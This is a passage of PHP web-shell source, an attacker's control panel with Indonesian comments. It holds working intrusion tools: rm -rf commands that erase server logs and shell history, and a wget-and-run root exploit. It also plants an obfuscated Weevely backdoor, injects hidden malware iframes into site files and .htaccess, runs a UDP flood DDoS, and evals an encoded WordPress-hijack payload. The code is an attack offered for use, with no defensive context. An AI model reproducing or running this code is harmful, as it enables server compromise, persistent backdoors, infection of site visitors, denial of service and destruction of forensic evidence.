	passthru("rm -rf /usr/local/apache/log");
	passthru("rm -rf /var/apache/logs");
	passthru("rm -rf /var/apache/log");
	passthru("rm -rf /var/run/utmp");
	passthru("rm -rf /var/logs");
	passthru("rm -rf /var/log");
	passthru("rm -rf /var/adm");
	passthru("rm -rf /etc/wtmp");
	passthru("rm -rf /etc/utmp");
	passthru("rm -rf $HISTFILE");
	passthru("rm -rf /var/log/lastlog");
	passthru("rm -rf /var/log/wtmp");


	system("rm -rf /tmp/logs");
	sleep(2);
	echo'<p>Deleting .../tmp/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
	sleep(2);

	system("rm -rf /root/.bash_history");
	sleep(2);
	echo'<p>Deleting .../root/.bash_history <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /root/.ksh_history");
	sleep(2);
	echo'<p>Deleting .../root/.ksh_history <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /root/.bash_logout");
	sleep(2);
	echo'<p>Deleting .../root/.bash_logout <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /usr/local/apache/logs");
	sleep(2);
	echo'<p>Deleting .../usr/local/apache/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /usr/local/apache/log");
	sleep(2);
	echo'<p>Deleting .../usr/local/apache/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /var/apache/logs");
	sleep(2);
	echo'<p>Deleting .../var/apache/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /var/apache/log");
	sleep(2);
	echo'<p>Deleting .../var/apache/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /var/run/utmp");
	sleep(2);
	echo'<p>Deleting .../var/run/utmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /var/logs");
	sleep(2);
	echo'<p>Deleting .../var/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /var/log");
	sleep(2);
	echo'<p>Deleting .../var/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /var/adm");
	sleep(2);
	echo'<p>Deleting .../var/adm <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /etc/wtmp");
	sleep(2);
	echo'<p>Deleting .../etc/wtmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /etc/utmp");
	sleep(2);
	echo'<p>Deleting .../etc/utmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf $HISTFILE");
	sleep(2);
	echo'<p>Deleting ...$HISTFILE <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>'; 

	system("rm -rf /var/log/lastlog");
	sleep(2);
	echo'<p>Deleting .../var/log/lastlog <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	system("rm -rf /var/log/wtmp");
	sleep(2);
	echo'<p>Deleting .../var/log/wtmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';

	sleep(4);

	echo '<p><i>Your Traces Has Been Successfully Deleting ...From the Server</i></p><br>';
	echo '</center>';
    echo '</table></td></tr>';
}
if($_GET['do'] == 'r00t') {
echo"<center>
<form method='post'>
<h3>Just Work In Kernel -2016</h3>
Login: ( ssh azzatssins@".$ip." ) or ( su azzatssins )<br><br>
New Password: <input type='text' name='passwd' value='17081945'>
<input type=submit name=azzzt value='Root!'></form></center>";
if($_POST['azzzt']) {
exe("wget https://raw.githubusercontent.com/cyberserkers/root/master/azx && chmod +x azx && ./azx ".$_POST['passwd']);
}}
function success($for, $var1) {
    $domain = $_SERVER['HTTP_HOST'];
    $script = $_SERVER['SCRIPT_NAME'];
    $full_url = $_SERVER['REQUEST_URI'];
	if ($for == "weevely") {
        $message = "<center><font color='lime'>Weevely installed!</font></center>";
        $redirect = "";
    }
if (empty($redirect)) {
echo "<script>
function remove (){
document.getElementById('content').innerHTML='';
}
setInterval(function(){remove();}, 2700);
</script>";
} else {
	echo "<script>
function remove (){
 window.location = '$redirect'
}
setInterval(function(){remove();}, 2500);
</script>";
    }
}
function error($mesg) {
    $error = "<center><font color='red'>$mesg</font></center>";
    echo "$error";
}
if (isset($_GET['weevely'])) {
    echo "<center><h3>Weevely Backdoor</h3>
<form action='' method='post'>
Directory to install weevely backdoor:<br>
<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
Name of file (something .php):<br>
<input type='text' name='weev_name' class='text' value='weevely.php'><br>
Password (more than 3 characters):<br>
<input type='text' name='weev_pass' class='text'><br>
<input type='submit' name='install_weev' value='Backdoor!'><br>
</font>
</center>";
}
if (isset($_POST['install_weev'])) {
    $weevdir = rtrim($_POST['weev_dir'], '/');;
    $weevname = $_POST['weev_name'];
    $weevpassword = $_POST['weev_pass'];
    if (strlen($weevpassword) < 3) {
        error("Password must be longer than 3 characters!");
    } else {
        $first2 = $weevpassword[0] . $weevpassword[1];
        $rest = substr($weevpassword, 2);
        $money = "$";
        $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
        $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
        $weevelybd3 = "$money" . "k='$rest';";
        $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
        $all = "<?php eval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "')); ?>";
        if (file_put_contents($weevdir . '/' . $weevname, $all)) {
            echo "<center><font color='lime'>Weevely installed!<br><br>Usage: weevely [URL of backdoor] [password]</font></center>";
            success("weevely");
        } else {
            error("Failed to write backdoor to $weevdir");
        }
    }
}
elseif($_GET['do'] == 'malware')
    { 
@ini_set('output_buffering', 0); {
?>
<form action="" method="post">
    <center>
<h3>Malware Tools</h3>
<font color="red">Private Network / Dial Up Modem ,PC Private , ato Home PC / NETWORK</font>&nbsp;(Ojo digawe goblok!!)<br><br>
    <input class='kotak' type='submit' name='redirect' value="Redirect Search Engine To Malware Site" /></td><td>
    <input type='submit' class='kotak' name='infect' value="Infect User" /></td><tr></table>
        <input type='submit' name='code' class='kotak' value="Code Insert" /></td><tr></table>
</center><br>

<?php
        if (isset($_POST['redirect'])) if ($myfile = fopen(".htaccess", 'a')) {
            fwrite($myfile, gzuncompress(base64_decode($mal)));
            fwrite($myfile, "

");
            fclose($myfile);
            ob_end_flush();
        } else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
    }   if (isset($_POST['infect'])) {
        $coun = 0;
        $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=" . $malsite . "> </iframe>";
        foreach (glob($_GET['dir'] . $directorysperator . "*.php") as $injectj00) {
            if ($myfile = fopen($injectj00, 'a')) {
                fputs($myfile, $str);
                fclose($myfile);
            } else $coun = 1;
        }
        foreach (glob($_GET['dir'] . $directorysperator . "*.htm") as $injectj00) {
            if ($myfile = fopen($injectj00, 'a')) {
                fputs($myfile, $str);
                fclose($myfile);
            } else $coun = 1;
        }
        foreach (glob($_GET['dir'] . $directorysperator . "*.html") as $injectj00) {
            if ($myfile = fopen($injectj00, 'a')) {
                fputs($myfile, $str);
                fclose($myfile);
            } else $coun = 1;
        }
        if ($coun == 0) echo "<script>alert('Malware Infect In user ... DONE...!!!!'); hideAll();</script>";
        else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
    }
    if (!isset($_POST['code'])) {
        if ($file1 = fopen(".htaccess", 'r')) {
        } else echo "<script>alert('Malware Ga ke kirim Jancookk'); hideAll();</script>";
    } else {
        if ($myfile = fopen(".htaccess", 'a')) {
            fwrite($myfile, $_POST['code']);
            fwrite($myfile, "

");
            fclose($myfile);
            ob_end_flush();
        } else echo "Permission Denied";
    }
}
elseif($_GET['do'] == 'masschm') {
/*
Chmod Mass File and Folder
Cod3d by Mr.xBarakuda
v1.1
*/

// inisialisasi variabel gan
$dosPerm = "0";
$ficPerm = "0";
$retval = "0"; // jumlah error CHMOD gan

 // jalur folder untuk diproses disini
    $chem = preg_replace("/[^_A-Za-z0-9-\.%\/]/i",'', $_POST["chemin"]);
    $chem = preg_replace("/\.\.\//",'', $chem);
    define('ABSPATH', dirname(__FILE__));
    $chem = ABSPATH.$chem; // Directory normal nya :v

// perijinan/hak folder
    $d1 = preg_replace("/[^57]/",'', $_POST["dir1"]);
    $d2 = preg_replace("/[^057]/",'', $_POST["dir2"]);
    $d3 = preg_replace("/[^057]/",'', $_POST["dir3"]);
    $dosPerm = "0".$d1.$d2.$d3;
    $dosPerm = octdec($dosPerm);
// perijinan/hak file
    $f1 = preg_replace("/[^46]/i",'', $_POST["fic1"]);
    $f2 = preg_replace("/[^046]/i",'', $_POST["fic2"]);
    $f3 = preg_replace("/[^046]/i",'', $_POST["fic3"]);
    $ficPerm = "0".$f1.$f2.$f3;
    $ficPerm = octdec($ficPerm);

    print "<html><meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />";
    print "<body><center><h3>CHMOD Mass File and Folder by Mr.xBarakuda</h3>";
    print "<table><tr><td>";
    print "<form method=\"post\">";
    print "<tr><td>Hak Folder: </td>";
    print "<td><select name=\"dir1\"><option value=\"5\">5</option><option value=\"7\" selected>7</option></select><select name=\"dir2\"><option value=\"0\">0</option><option value=\"5\" selected>5</option><option value=\"7\">7</option></select><select name=\"dir3\"><option value=\"0\">0</option><option value=\"5\" selected>5</option><option value=\"7\">7</option></select></td></tr>";
    print "<tr><td>Hak File: </td>";
    print "<td><select name=\"fic1\"><option value=\"4\">4</option><option value=\"6\" selected>6</option></select><select name=\"fic2\"><option value=\"0\">0</option><option value=\"4\" selected>4</option><option value=\"6\">6</option></select><select name=\"fic3\"><option value=\"0\">0</option><option value=\"4\" selected>4</option><option value=\"6\">6</option></select></td></tr>";
    print "<tr><td>CWD =></td>";
    print "<td>".ABSPATH." <input type=\"text\" name=\"chemin\" maxlength=\"80\" size=\"30\" value=\"/\" ></td></tr>";
    print "<tr><td> </td><td><input type=\"submit\" value=\" Change Permissions! \"></center>";
    print "</form>";
    print "</td></tr></table>";
if ( ($dosPerm||$ficPerm) > 0 ){

    function rChmod($chem,$dosPerm,$ficPerm) {
        echo "<p><b>Result:</b></p>
";

        $d = new RecursiveDirectoryIterator($chem);
        $d ->setFlags(RecursiveDirectoryIterator::SKIP_DOTS);
        foreach (new RecursiveIteratorIterator($d, 1) as $path) {
            $chmodret = false;
            $chmodresultat = "";
            if ( $path->isDir() ) {
            $chmodret = chmod( $path, $dosPerm ); }
            else {
            if ( is_file( $path )  ) {
            $chmodret = chmod( $path, $ficPerm ); }
            }
            if ($chmodret) {$chmodresultat = "<font color=lime>[+] SUKSES [+]</font>"; }
            else {
                $chmodresultat = "<font color=red>[-] ERROR [-]</font>";
                ++$retval;
                }
            echo $chmodresultat . " " . $path . "<br>
";
        }
    return $retval;
    }
    $nbfailed = rChmod($chem,$dosPerm,$ficPerm);
    echo "<p><b>";
    if ($nbfailed > 0) {
        echo $nbfailed . "<font color=red>CHMOD error, liat kesalahan diatas</font>";
        }
    else echo "<font color=lime>DONE gan :v</font></p>
";
}
    print "</body></html>";
}
elseif($_GET['do'] == 'base64pict') {
  /*
  ** Convert Gambar ke Base64
  ** Coded By Mr.xBarakuda
  */
  function imageBase64FromURL($url){
  $urlParts = pathinfo($url);
  $extension = $urlParts['extension'];
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($ch, CURLOPT_HEADER, 0);
  $response = curl_exec($ch);
  curl_close($ch);
  $base64 = 'data:image/'.$extension.';base64,'.base64_encode($response);
  return $base64;
  }
  echo '
  <center>
    <h3>Base64 Encode Gambar</h3>
    <p style="color:red;">Coded By Mr.xBarakuda</p>
    <form method="post">
      URL Gambar: </font>
      <input type="text" name="urlGambar" size="50" height="10" placeholder="http://kudagans.go.id/gue_gans.jpg" style="margin: 5px auto; padding-right: 5px;" required>
      <input type="submit" name="encode" value="Encode">
    </form>
    ';
    $urlGambar = $_POST['urlGambar'];
    $encode = $_POST['encode'];
    $encodeGambar = imageBase64FromURL($urlGambar);
    echo "
    <textarea cols='100' rows='23'>".$encodeGambar."</textarea>
    ";
    echo "
    <br>
  </center>";
  }
elseif($_GET['do'] == 'w00t'){
print'<center>';
print'<h3>Autoroot Generator Coded By Mauritania Attacker</h3>';
print'<b>Special Greet To HusseiN98D</b><br>';
print'<b>2005 - 2013</b>';
print"<p align='center'><img border='0' src='http://www.spirit-of-metal.com/les%20goupes/R/Root/pics/logo.jpg'></p>";
@error_reporting(0);
sleep(2);
print "<p><b>Script Autoroot Perl Extracted Successfully...!</b></p><br>";
//generate autoroot script perl
mkdir('kuda_root',0755);
$shellw0rm = '';
$chmoderr = fopen("kuda_root/autoroot.pl" ,"w+");
$write = fwrite ($chmoderr ,base64_decode($shellw0rm));
if($write){
print '<p>Script Autoroot is here => '.getcwd().'/kuda_root/autoroot.pl</p>';
fclose($chmoderr);
chmod("kuda_root/autoroot.pl",0755);
//Extracting htaccess to enable perl handler and type all depends on the server :D
$htaccess = 'T3B0aW9ucyBJbmNsdWRlcyBJbmNsdWRlc05PRVhFQyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAucGwNCkFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1jZ2kgLnBsDQpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLnBsDQpBZGRIYW5kbGVyIGNnaS1zY3JpcHQgLnBs';
$lol = fopen("kuda_root/.htaccess" ,"w+");
$dwrite = fwrite ($lol ,base64_decode($htaccess));
fclose($chmoderr);
print '<p>Back Connect and go to this directory => cd '.getcwd().'/kuda_root/</p>';
print "<p>Autoroot Command: perl autoroot.pl</p>";
print '</center>';
    }
}
elseif($_GET['do'] == 'hijack_wp') {
$kudagans="lUh6Yts2EP5hwP/hygWQA6SWX+o2Ziy3duquBdouVdJo2EMYlFFbeSRFIanYztr/3qMkWPKytLO+iDzdPffcZlQKXmPB55qZjiMzk3Nz7nSLBUZcLJ0j6B2etFvPp+3WcSFIAjQwXAqPAIGEmVWGHlalNsQ6BFkYpqaTdTD9JEiYKqY1vBUhW8Mb/oUG12Ou+O3xxFKHiVttcNzzNFfbLRZREsg2QgnunP9+bOVLJ3o2McOFbnhQFaPwQruFCfgdGwspGJIMcSzVGH7p//p59Po1oMVUFlmN++katIxsa//b45gtzBj+0+Nbu8UFym4z7W/vT4fSGIaRw+HZTP4NAydhwZeclIU5O3IRW0mumY9t+bkKKdCYL0TaTxgyBTTycQlNBR6JjFbHrrtNrYbd3t1drxvIxB30+kLc3jG+3f7IfdofjW1Ch6PjYSqWBBVBtwm2jUxVbiAvxSNyKQSshB5sT2BOA1xcU6guXCF2ay+FJNMzGW9oLzfwnnOKGyo4hUZwsJ1ZTPQLFkceqrt+VhW9zk86ZHq2us9yldtdoazZpJjStpTALY0z3MQyoGRxVAoEWtCQLqPtgD0YFEVQfarZ3IZ5A1BfJOLHZDiiC76uMhW7H1NxminrPQ/9OkKmFT4/VlK1XuHQNALTSBj6viAPikfNbRBwtFTsugqWK055M9He7/UIKLnC5TNRwyGjYAfmMbvJ+K1UsC48KpFoVGBuPNI7+WvxziuHCqkZ5maRz5SiK2r953n01x+zD5bZlsO0MarNImjmJ7x3SZYOqorLM59fAKQIautWR8nUwcMB+BwULQYPDub2YPztFAbn89YhYnLje75ifi46sONEmHenRe1zlsJFu/D8rvJAG8VGjZpUWWoqYhTc+XxLweXD0lHLDRWY69YucZXOVnbnC6ggRC1RtPcLlM+LcaNi4jn2VrDAZ1dyjuoSj6pPDk4qCDnrFCFZKak6h1t+DTDNb8TCuesUOv488ABCRsw+YFR6fXIZXchibVqajjm9Pm0VSzcZRpsO+Wv+6vR31oS5nF2BjZ4bYW9RaAjilW0jsAOf3swuc/D2FVmhB6RWxgr2qFm0o0haYLAHgfII7FLhG7BLswaRwQNRhnsQEbm8+7Col+WUxEWzzr+12vbk69dXnXc5vMe7+OtJN0GK52fnP+HEPG7O9DK71lmXv/FU1d2O7q5fH3hlQrO90ykWOtPf6JLGY6qzZOd/pSqW+PoO";error_reporting(0);@set_time_limit(0);eval(gzinflate(str_rot13(base64_decode($kudagans))));
}
elseif($_GET['do'] == 'ddos') {
?>
<form action=" " method="post">
<center>
Your IP: <font color="red"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font>&nbsp;( Don't DoS Yourself Noob )
<h3>DDoS Tool</h3>
<table>
<tr><tr><td>IP Target</td><td>:</td>
<td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
</td></tr>
<tr><td>Time</td><td>:</td>
<td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
</td></tr>
<tr><td>Port</td><td>:</td>
<td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
</td></tr></tr></table><br>
<input type="submit" class="inputzbut" name="fire" value="Fire!">
<br><br>
After initiating the DoS attack, please wait while the browser loads.
</th></center></form></tr></tr></center></form>
<?php
    $submit = $_POST['fire'];
    if (isset($submit)) {
        $packets = 0;
        $ip = $_POST['ip'];
        $rand = $_POST['port'];
        set_time_limit(0);
        ignore_user_abort(FALSE);
        $exec_time = $_POST['time'];
        $time = time();
        print "<br>Flooded: $ip on port $rand <br><br>";
        $max_time = $time + $exec_time;
        for ($i = 0;$i < 65535;$i++) {
            $out.= "X";
        }
        while (1) {
            $packets++;
            if (time() > $max_time) {
                break;
            }
            $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
            if ($fp) {
                fwrite($fp, $out);
                fclose($fp);
            }
        }
        echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s ";
    }
}
elseif($_GET['do'] == 'endecode') {
@ini_set('output_buffering',0); 
@ini_set('display_errors', 0);
$text = $_POST['code'];
?>
<center><h3>Encode And Decode By Mr.xBarakuda</h3>
<form method="post"><br>
<textarea cols='60' rows='10' name="code"></textarea><br><br>
<select size="1" name="kuds">
<option value="urlencode">url</option>
<option value="base64">base64</option>
<option value="ur">convert_uu</option>
<option value="json">json</option>
<option value="gzinflates">gzinflate - base64</option>
<option value="str2">str_rot13 - base64</option>
<option value="gzinflate">str_rot13 - gzinflate - base64</option>
<option value="gzinflater">gzinflate - str_rot13 - base64</option>
<option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
<option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
<option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
<option value="hexencode">Hex</option>
<option value="str_rot13">ROT13 Hash</option>
<option value="strlen">strlen</option>
<option value="xxx">unescape</option>
<option value="bbb">charAt</option>
<option value="aaa">chr - bin2hex - substr</option>
<option value="www">chr</option>
<option value="sss">htmlspecialchars</option>
<option value="eee">escape</option>
</select>&nbsp;<input type='submit' name='encd' value='Encode'> <input type='submit' name='decd' value='Decode'>
</form></center>
<br>
<?php 
$submit = $_POST['encd'];
if (isset($submit)){
$op = $_POST["kuds"];
switch ($op) {case 'base64': $codi=base64_encode($text);
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case 'json' : $codi=json_encode(utf8_encode($text));
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
break;case 'str2' : $codi=base64_encode(str_rot13($text));
break;case 'urlencode' : $codi=rawurlencode($text);
break;case 'ur' : $codi=convert_uuencode($text);
break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
break;case 'hexencode' : $codi=bin2hex($text);
break;case 'str_rot13' : $codi=str_rot13($text);
break;case 'strlen' : $codi=strlen($text);
break;case 'xxx' : $codi=strlen(bin2hex($text));
break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
break;case 'www' : $codi=chr($text);
break;case 'sss' : $codi=htmlspecialchars($text);
break;case 'eee' : $codi=addslashes($text);
break;default:break;}}

$submit = $_POST['decd'];
if (isset($submit)){
$op = $_POST["kuds"];
switch ($op) {case 'base64': $codi=base64_decode($text);
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case 'json' : $codi=utf8_decode(json_decode($text));
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
break;case 'str2' : $codi=str_rot13(base64_decode($text));
break;case 'urlencode' : $codi=rawurldecode($text);
break;case 'ur' : $codi=convert_uudecode($text);
break;case 'hexencode' : $codi=quoted_printable_decode($text);
break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
break;default:break;}}
$html = htmlentities(stripslashes($codi));
echo "<textarea cols=60 rows=10>".$html."</textarea><br>";
}
elseif($_GET['do'] == 'zip_menu') {
    echo "<center>";
    echo "<h3>Zip Menu</h3>";
function rmdir_recursive($dir) {
    foreach(scandir($dir) as $file) {
       if ('.' === $file || '..' === $file) continue;
       if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
       else unlink("$dir/$file");
   }
   rmdir($dir);
}
if($_FILES["zip_file"]["name"]) {
    $filename = $_FILES["zip_file"]["name"];
    $source = $_FILES["zip_file"]["tmp_name"];
    $type = $_FILES["zip_file"]["type"];
    $name = explode(".", $filename);
    $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
    foreach($accepted_types as $mime_type) {
        if($mime_type == $type) {
            $okay = true;
            break;
        } 
    }
    $continue = strtolower($name[1]) == 'zip' ? true : false;
    if(!$continue) {
        $message = "Itu Bukan Zip, GOBLOK COK";
    }
  $path = dirname(__FILE__).'/';
  $filenoext = basename ($filename, '.zip'); 
  $filenoext = basename ($filenoext, '.ZIP');
  $targetdir = $path . $filenoext;
  $targetzip = $path . $filename; 
  if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  mkdir($targetdir, 0777);
    if(move_uploaded_file($source, $targetzip)) {
        $zip = new ZipArchive();
        $x = $zip->open($targetzip); 
        if ($x === true) {
            $zip->extractTo($targetdir);
            $zip->close();
 
            unlink($targetzip);
        }
        $message = "<b>Sukses Cok :)</b>";
    } else {    
        $message = "<b>Error Jancok :(</b>";
    }
}   
echo '<table style="width:100%" border="1">
  <tr><h4>Upload And Unzip</h4><form enctype="multipart/form-data" method="post" action="">
<label>Zip File: <input type="file" name="zip_file" /></label>
<input type="submit" name="submit" value="Upload And Unzip" />
</form><br><br>';
if($message) echo "<p>$message</p>";
echo "</tr><hr color='cyan'><tr><h4>Zip Backup</h4>
<form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><br>
<font style='text-decoration: underline;'>Save To:</font><br>
<input type='text' name='save' value='$dir/kuda_backup.zip' style='width: 450px;' height='10'><br><br>
<input type='submit' name='backup' value='Back Up!' style='width: 215px;'></form><br><br>"; 
    if($_POST['backup']){ 
    $save=$_POST['save'];
    function Zip($source, $destination)
{
    if (extension_loaded('zip') === true)
    {
        if (file_exists($source) === true)
        {
            $zip = new ZipArchive();

            if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
            {
                $source = realpath($source);

                if (is_dir($source) === true)
                {
                    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);

                    foreach ($files as $file)
                    {
                        $file = realpath($file);

                        if (is_dir($file) === true)
                        {
                            $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
                        }

                        else if (is_file($file) === true)
                        {
                            $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
                        }
                    }
                }

                else if (is_file($source) === true)
                {
                    $zip->addFromString(basename($source), file_get_contents($source));
                }
            }

            return $zip->close();
        }
    }

    return false;
}
    Zip($_POST['dir'],$save);
    echo "Kelar, save ke <b>$save</b>";
    }
    echo "
    </tr><hr color='cyan'><tr><h4>Unzip Manual</h4>
    <form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br>
    <input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><br>
    <font style='text-decoration: underline;'>Save To:</font><br>
    <input type='text' name='save' value='$dir/kuda_unzip' style='width: 450px;' height='10'><br><br>
    <input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form><br><br>
    </div>";
    if($_POST['extrak']){
    $save=$_POST['save'];
    $zip = new ZipArchive;
    $res = $zip->open($_POST['dir']);
    if ($res === TRUE) {
        $zip->extractTo($save);
        $zip->close();
    echo 'Sukses, lokasi ada di: <b>'.$save.'</b>';
    } else {
    echo 'Gagal Cok :( Ntahlah !';
    }
    }
echo '</tr></table>';   
echo "</center>";
}
  elseif($_GET['do'] == 'honey') { ?>
  <center>
  <h3>Make A Trap And Troll The Lamers</h3>
  <p style='color: cyan;'>Honeypot adalah jebakan dalam bentuk bug palsu untuk menjebak hacker</p>
  <form method="post">
    <input type="submit" name="make" value="Make It">
  </form>
  <?php
    $target = explode("
", $_POST['target']);
    if($_POST['make']) {
      foreach($target as $korban) {
        $global = "upload.php";
        $isi_nama_doang = "PD9waHANCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8vIFRoaXMgTG9nZ2VkIENvZGVkIEJ5IE1yLnhCYXJha3VkYSAgICAvLw0KLy8gTWFrZSBhIHRyYXAgYW5kIFRyb2xsIHRoZSBMYW1lcnMgOnYgLy8NCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCmRhdGVfZGVmYXVsdF90aW1lem9uZV9zZXQoJ0FzaWEvSmFrYXJ0YScpOw0KJGlwID0gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ107DQokcG9ydCA9ICRfU0VSVkVSWydSRU1PVEVfUE9SVCddOw0KJHByb3RvY29sID0gJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddOw0KJG1ldGhvZCA9ICRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddOw0KJGFnZW50ID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KJHRnbCA9IGRhdGUoImQtTS1ZIC8gaDppIGEiKTsNCiRsb2cgPSBmb3Blbigna3VkYV9sb2cudHh0JyAsYSk7DQpmd3JpdGUoJGxvZyAsIi09LT0tPS09LT0tPS0iLiIgIik7DQpmd3JpdGUoJGxvZyAsIiBKRUJBS0FOIEdBTiAiLiIgIik7DQpmd3JpdGUoJGxvZyAsIi09LT0tPS09LT0tPS0iLiIgIik7DQpmd3JpdGUoJGxvZyAsIiBJUCBBZGRyZXNzOiAiLiRpcC4iIExvZ2dlZCBPbiA9PiBbICIuJHRnbC4iIF0iLiIgIik7DQpmd3JpdGUoJGxvZyAsIiBQb3J0IE51bWJlcjogIi4kcG9ydC4iICIpOw0KZndyaXRlKCRsb2cgLCIgUHJvdG9jb2w6ICIuJHByb3RvY29sLiIgIik7DQpmd3JpdGUoJGxvZyAsIiBVc2VyIEFnZW50OiBbICIuJGFnZW50LiIgXSIuIiAiKTsNCmZ3cml0ZSgkbG9nICwiIE1ldGhvZDogIi4k